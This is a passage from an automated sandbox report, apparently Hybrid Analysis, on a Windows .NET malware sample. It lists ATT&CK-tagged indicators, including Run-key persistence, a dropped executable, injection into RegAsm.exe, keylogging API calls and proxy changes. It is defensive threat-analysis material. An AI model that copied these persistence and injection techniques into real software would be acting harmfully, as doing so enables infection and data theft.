\"http://www.w3.org/2001/04/xmlenc#ripemd160\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#des-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#tripledes-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-tripledes\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes128-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes128\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes192-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes192\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes256-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes256\"\n Pattern match: \"http://www.w3.org/tr/2001/rec-xml-c14n-20010315\"\n Pattern match: \"http://www.w3.org/tr/2001/rec-xml-c14n-20010315#withcomments\"\n Pattern match: \"http://www.w3.org/2001/10/xml-exc-c14n#\"\n Pattern match: \"http://www.w3.org/2001/10/xml-exc-c14n#withcomments\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#base64\"\n Pattern match: \"http://www.w3.org/tr/1999/rec-xpath-19991116\"\n Pattern match: \"http://www.w3.org/tr/1999/rec-xslt-19991116\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"\n Pattern match: \"http://www.w3.org/2002/07/decrypt#xml\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#hmac-sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#md5\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-md5\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-ripemd160\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha512\"\n Heuristic match: \"_smsvchostperfcounters.hu\"\n Heuristic match: \"up.ma\"\n Heuristic match: \"nx.th\"\n Heuristic match: \"2/4.tk\"\n Heuristic match: \"ystem.co\"\n Pattern match: \"http://www.w3.org/2000/xmlns/\"\n Pattern match: \"http://www.w3.org/xml/1998/namespace\"\n Pattern match: \"http://schemas.microsoft.com/.netconfiguration/v2.0\"\n Pattern match: \"system.web/anonymousidentification\"\n Pattern match: \"system.web/authentication\"\n Pattern match: \"system.web/authorization\"\n Pattern match: \"system.web/browsercaps\"\n Pattern match: \"system.web/clienttarget\"\n Pattern match: \"system.web/compilation\"\n Pattern match: \"system.web/customerrors\"\n Pattern match: \"system.web/deployment\"\n Pattern match: \"system.web/devicefilters\"\n Pattern match: \"system.web/fulltrustassemblies\"\n Pattern match: \"system.web/globalization\"\n Pattern match: \"system.web/healthmonitoring\"\n Pattern match: \"system.web/hostingenvironment\"\n Pattern match: \"system.web/httpcookies\"\n Pattern match: \"system.web/httphandlers\"\n Pattern match: \"system.web/httpmodules\"\n Pattern match: \"system.web/httpruntime\"\n Pattern match: \"system.web/identity\"\n Pattern match: \"system.web/machinekey\"\n Pattern match: \"system.web/membership\"\n Pattern match: \"system.web/mobilecontrols\"\n Pattern match: \"system.web/pages\"\n Pattern match: \"system.web/partialtrustvisibleassemblies\"\n Pattern match: \"system.web/processmodel\"\n Pattern match: \"system.web/profile\"\n Pattern match: \"system.web/protocols\"\n Pattern match: \"system.web/rolemanager\"\n Pattern match: \"system.web/securitypolicy\"\n Pattern match: \"system.web/sessionpagestate\"\n Pattern match: \"system.web/sessionstate\"\n Pattern match: \"system.web/sitemap\"\n Pattern match: \"system.web/trace\"\n Pattern match: \"system.web/trust\"\n Pattern match: \"system.web/urlmappings\"\n Pattern match: \"system.web/webcontrols\"\n Pattern match: \"system.web/webparts\"\n Pattern match: \"system.web/webservices\"\n Pattern match: \"system.web/xhtmlconformance\"\n Pattern match: \"system.web/caching\"\n Pattern match: \"system.web/caching/cache\"\n Pattern match: \"system.web/caching/outputcache\"\n Pattern match: \"system.web/caching/outputcachesettings\"\n Pattern match: \"system.web/caching/sqlcachedependency\"\n Heuristic match: \"e type=system.web.co\"\n Heuristic match: \"em.sd\"\n Heuristic match: \"model.co\"\n Heuristic match: \"iupz<.so\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002568)\n \"Webfrequency.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00001812)\n \"RegAsm.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00000352)\n \"Webfrequency.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; Source: \"00000000-00000352-00000C29-1969719705\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"k\te=<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"n=<IPv4>, C\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>, Cul\"\n Potential IP \"<IPv4>\" found in string \"ion=<IPv4>, Culture=neutral, Public\"\n Potential IP \"<IPv4>\" found in string \"n=<IPv4>, Culture=neutral, Pu3B\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>,xY<\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"ystem.Numerics,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"em.Data.SqlXml,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"ion=<IPv4>, Culture=neu\"\n Potential IP \"<IPv4>\" found in string \"sion=<IPv4>, Culture=neutral, PublicKeyToken=31bf3856ad364e35\"/>\", Potential IP \"<IPv4>\" found in string \"<IPv4>\n\", Potential IP \"<IPv4>\" found in string \"<IPv4>\nD\", Potential IP \"<IPv4>\" found in string \"=<IPv4>\", \"<IPv4>\", Potential IP \"<IPv4>\" found in string \"ersion=<IPv4>\n Culture=neutral\n PublicKeyToken=\", Potential IP \"<IPv4>\" found in string \"rsion=<IPv4>\n Culture=neutral\n PublicKeyToken=b03f5f7f11d50a3\", Potential IP \"<IPv4>\" found in string \"=<IPv4>\n Culture=neutral\n PublicKeyToken=b03f5f7f11d50a3a\" al\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-98", "type": 2, "relevance": 1, "name": "Possibly tries to communicate over SSL connection (HTTPS)", "description": "Found HTTPS url \"https://www.digicert.com\"", "origin": "File/Memory", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://user.configfile:.configfile://datadirectoryc:\\users\\hapubws\\appdata\\roaming\\webdevelop\\webfrequency.exe.configfile:///c:/users/hapubws/appdata/roaming/webdevelop/webfrequency.exec:/users/hapubws/appdata/roaming/webdevelop/webfrequency.exec:\\users\\hapubws\\appdata\\roaming\\webdevelop\\webfrequency.exehttphttpsfilegophernntpnewsmailtouuidtelnetldapnet.tcpnet.pipevsmacrostargetframeworkmonikerrflct.invalidfieldfailrflct.invalidpropfail0123456789abcdefsystem.net/machine/exe/roaming_user/local_usermachine/exe/roaming_userservice\" - Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found URL \"http://go.microsoft.com/fwlink/?linkid=42127\" - Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found URL \"http://www.w3.org/2000/09/xmldsig\" - Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found URL \"http://user.configfile:.configfile://datadirectoryc:\\02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe.configfile:///c:/02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exec:/02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exec:\\02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exehttphttpsfilegophernntpnewsmailtouuidtelnetldapnet.tcpnet.pipevsmacrostargetframeworkmonikerrflct.invalidfieldfailrflct.invalidpropfail0123456789abcdefsystem.net/machine/exe/roaming_user/local_usermachine/exe/roaming_userservice\" - Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found URL \"http://go.microsoft.com/fwlink/?linkid=42127\" - Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found URL \"http://www.w3.org/2000/09/xmldsig\" - Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found URL \"http://ocsp.digicert.com0c7http://cacerts.digicert.com/digicertassuredidrootca.crt0z0x0:4http://crl4.digicert.com/digicertassuredidrootca.crl0:4http://crl3.digicert.com/digicertassuredidrootca.crl0oh0f080*0(https://www.digicert.com/cps0,\" - Source: \"00000000-00002568.00000001.186418.02C90000.00000004.mdmp\")\n Found URL \"http://crl3.digicert.com/sha2-assured-cs-g1.crl05/http://crl4.digicert.com/sha2-assured-cs-g1.crl0le0c070*0(https://www.digicert.com/cps0x0v0$http://ocsp.digicert.com0nbhttp://cacerts.digicert.com/digicertsha2assuredidcodesigningca.crt0\" - Source: \"00000000-00002568.00000001.186418.02C90000.00000004.mdmp\")\n Found URL \"http://ts-ocsp.ws.symantec.com07+http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<50301+http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(timestamp-2048-20b07x,&c3\\vno^efany3+.\" - Source: \"00000000-00002568.00000001.186418.02C90000.00000004.mdmp\")\n Found URL \"http://ocsp.thawte.com080604.http://crl.thawte.com/thawtetimestampingca.crl0timestamp-2048-10y@b%digicert\" - Source: \"00000000-00002568.00000001.186418.02C90000.00000004.mdmp\")\n Found URL \"http://www.mozilla.com08mpslgrr'qe[zvd\" - Source: \"00000000-00002568.00000001.186418.02C90000.00000004.mdmp\")\n Found URL \"http://go.microsoft.com/fwlink/?linkid=42127\" - Source: \"00000000-00004536.00000001.196727.001C0000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: db95a4cb23548a635a1dfebcee9991cb", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-108", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption (API string)", "description": "Found reference to API \"description=\"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\"\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp\")\n Found reference to API \"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to API \"description=\"Uses CryptProtectData\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00002568.00000000.185301.00320000.00000004.mdmp\"), Found reference to API \"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\"), Found reference to API \"description=\"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\"\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\"), Found reference to API \"description=\"Uses CryptProtectData and\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00004536.00000001.196727.001C0000.00000004.mdmp\")\n Found reference to API \"description=\"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\"\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00004536.00000001.196727.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-280", "type": 2, "relevance": 1, "name": "Contains reference to cryptographic keys", "description": "Found string \"http://www.w3.org/2001/04/xmlenc# EncryptedKey\" (Indicator: \"encryptedkey\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.Xml.KeyInfoEncryptedKey, System.Security, Version=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" (Indicator: \"encryptedkey\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"http://www.w3.org/2001/04/xmlenc# EncryptedKey\" (Indicator: \"encryptedkey\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.Xml.KeyInfoEncryptedKey, System.Security, Version=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" (Indicator: \"encryptedkey\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-106", "type": 2, "relevance": 1, "name": "Contains ability to decode base64 data", "description": "Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00001812.00000001.188519.02C70000.00000004.mdmp\")\n Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to decode base64 data", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to perform encryption (API string)\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains reference to cryptographic keys\n Matched sigs: Contains ability to decode base64 data\n Matched sigs: Calls an API typically used to import cryptographic keys into a CSP\n Matched sigs: Reads the cryptographic machine GUID", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp, 00000000-00001812.00000001.188519.00320000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00002568.00000000.185301.00320000.00000004.mdmp, 00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume1\\??\\Volume{dcbfaac3-d863-11e7-b9ff-806e6f6e6963}2\" (Indicator: \"\\Device\\\"; Source: \"00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00002568.00000001.186418.04240000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00004536.00000000.195096.001C0000.00000004.mdmp, 00000000-00004536.00000001.196727.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-408", "type": 2, "relevance": 1, "name": "Contains ability to delete files", "description": "Observed string: \"del\" (Indicator: \"del\") in Source: 00000000-00004536.00000001.196727.001C0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"RegAsm.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00000352)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" opened \"\\Device\\KsecDD\"\n \"Webfrequency.exe\" opened \"\\Device\\KsecDD\"\n \"RegAsm.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"+ncalrpc:[OLE569D044E2EF3491AB3803CAB8A5B]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00001812.00000001.188519.00320000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLEFB323F6F49574928811D79F77915]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00002568.00000001.186418.00320000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE1CCD18E8F23C44ABABB842D6D7F7]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00004536.00000001.196727.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-75", "type": 8, "relevance": 3, "name": "Drops binary executable file with an unexpected extension", "description": "\"Webfrequency.exe.bin has unusual extension", "origin": "Binary File", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "api-49", "type": 6, "relevance": 10, "name": "Opens many files with write access (often indicator for full-system infection)", "description": "\"RegAsm.exe\" opens more than 500 files with write access", "origin": "API Call", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"WEBDEVELOP\"; Value: \"%APPDATA%\\Webdevelop\\Webfrequency.exe\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"Webfrequency.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\Webdevelop\\Webfrequency.exe]- [targetUID: 00000000-00002568]\n \"Webfrequency.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" wrote 3566 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Webdevelop\\Webfrequency.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" has section name .text with entropy \"6.81614427028\"\n \"Webfrequency.exe\" has section name .text with entropy \"6.81614427028\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"RegAsm.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"16\"}\n \"RegAsm.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"20\"}", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%APPDATA%\\Webdevelop\\Webfrequency.exe\" spawned likely due to injection\n Process \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "stream-85", "type": 1, "relevance": 5, "name": "Contains ability to open a port and listen for incoming connection", "description": "System.Type::InvokeMember(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Object,System.Object[]) at 0ca80052607f932a141d2a43b3249056-6000004-_~_", "origin": "Hybrid Analysis Technology", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"RegAsm.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "certificate-1", "type": 17, "relevance": 10, "name": "The input sample is signed with an invalid certificate", "description": "Error: The operation completed successfully. (0x0)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level": 2, "threat_level_human": 